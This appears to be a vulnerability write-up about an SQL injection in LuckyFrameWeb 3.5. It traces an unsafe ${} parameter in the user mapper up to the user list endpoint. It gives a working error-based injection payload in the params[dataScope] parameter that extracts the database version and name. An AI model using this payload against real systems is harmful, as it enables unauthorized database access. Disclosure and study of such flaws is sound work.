luckyframeweb3.5 sql inject 3

src/main/resources/mybatis/system/UserMapper.xml

There is a ${} in this mapper

image

Search selectUserList to see where the this select id is used:

image
UserController.java

Query user information:

image

Follow up the selectUserList method to see the specific implementation:

UserServiceImpl.java

image
The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

 

Verification:

Splice URL and parameters according to code:

1
2
3

http://127.0.0.1/system/user/list
params[dataScope]=

Use error injection to query the database version:

1
2

params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

image

Select database name:

image

 


声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.